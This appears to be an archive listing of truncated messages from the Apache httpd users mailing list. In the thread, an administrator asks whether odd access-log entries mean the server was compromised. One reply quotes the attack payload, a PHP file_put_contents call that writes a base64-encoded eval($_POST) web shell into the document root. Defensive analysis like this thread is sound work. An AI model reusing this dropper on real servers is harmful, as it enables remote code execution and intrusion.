Re: [users@httpd] am i hacked ?

2017-02-07 Thread Erik Dobák
with the current number of critters around probably yes. E On 6 February 2017 at 23:05, Wim Lewis wrote: > > On 2/6/2017 8:36 AM, Jack Swan wrote: > > What upsets me is that these two requests have statuscode 200, which > mean it was successfull. > > As Jonesy points out,

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Wim Lewis
On 2/6/2017 8:36 AM, Jack Swan wrote: > What upsets me is that these two requests have statuscode 200, which mean it > was successfull. As Jonesy points out, it's normal for the web server to simply ignore a request's query-string in a request where it wouldn't mean anything. So Apache is

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Kent Frazier
quot;);@set_magic_quotes_runtime();echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; - Original Message - From: bernd.len...@helmholtz-muenchen.de To: users@httpd.apache.org Sent: Mo

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
- On Feb 6, 2017, at 8:22 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote: >> OK. I think i understand most of it. >> First the attacker sets some values appropriate for him. Then he tries to >> create >> a file webconfig.txt.php and to write >> in it. >> Fortunately wwwrun

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
> OK. I think i understand most of it. > First the attacker sets some values appropriate for him. Then he tries to > create > a file webconfig.txt.php and to write > in it. > Fortunately wwwrun can't write in /sr/www ... , following > http://httpd.apache.org/docs/2.2/misc/security_tips.html

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
- On Feb 6, 2017, at 6:32 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote: > - On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote: > >> The first line is trying to create the file webconfig.txt.php in your >> DOCUMENT_ROOT directory, with the contents of the

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Eric Covener
On Mon, Feb 6, 2017 at 12:30 PM, Mitchell Krog wrote: > I see these type of attack strings all the time on Nginx except Nginx gives > a 403. Apache is notoriously bad with security and giving 200 ok responses > makes you yourself. A reason I and many other people

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
- On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote: > The first line is trying to create the file webconfig.txt.php in your > DOCUMENT_ROOT directory, with the contents of the file being: > > > > I didn't decode the remaining lines. I think they're just trying to do the >

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Mitchell Krog
I see these type of attack strings all the time on Nginx except Nginx gives a 403. Apache is notoriously bad with security and giving 200 ok responses makes you yourself. A reason I and many other people have switched. User support on this list was also non existent when I ran into serious

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Ken Robinson
On 2017-02-06 12:08 pm, Lentes, Bernd wrote: The first line is trying to create the file webconfig.txt.php in your DOCUMENT_ROOT directory, with the contents of the file being: I didn't decode the remaining lines. I think they're just trying to do the same thing. Fortunately there is

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
> The first line is trying to create the file webconfig.txt.php in your > DOCUMENT_ROOT directory, with the contents of the file being: > > > > I didn't decode the remaining lines. I think they're just trying to do the > same > thing. > Fortunately there is no webconfig.txt.php. And all

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
- On Feb 6, 2017, at 5:45 PM, Daniel dferra...@gmail.com wrote: > Actually now that I re-read the requests it also looks as shellshock succesful > attempt. > Operative system software not updated recently either? > 2017-02-06 17:42 GMT+01:00 Daniel < dferra...@gmail.com > : >> Have you

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Jack Swan
To: users@httpd.apache.org Sent: Monday, February 6, 2017 11:41:13 AM GMT -05:00 US/Canada Eastern Subject: Re: [users@httpd] am i hacked ? - On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote: > Hi, > > just in the moment i found two very weird entri

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Daniel
Actually now that I re-read the requests it also looks as shellshock succesful attempt. Operative system software not updated recently either? 2017-02-06 17:42 GMT+01:00 Daniel : > Have you tried to send those requests yourself and see what you get? > > Still those requests

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Daniel
Have you tried to send those requests yourself and see what you get? Still those requests seem to be aimed at your php framework. Do you use a very old php version as well? 2017-02-06 17:41 GMT+01:00 Lentes, Bernd : > > - On Feb 6, 2017, at 5:14 PM,

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote: > Hi, > > just in the moment i found two very weird entries in may access_log: > > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET >

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Jack Swan
04 AM GMT -05:00 US/Canada Eastern Subject: [users@httpd] am i hacked ? Hi, just in the moment i found two very weird entries in may access_log: 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quo

[users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
Hi, just in the moment i found two very weird entries in may access_log: 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET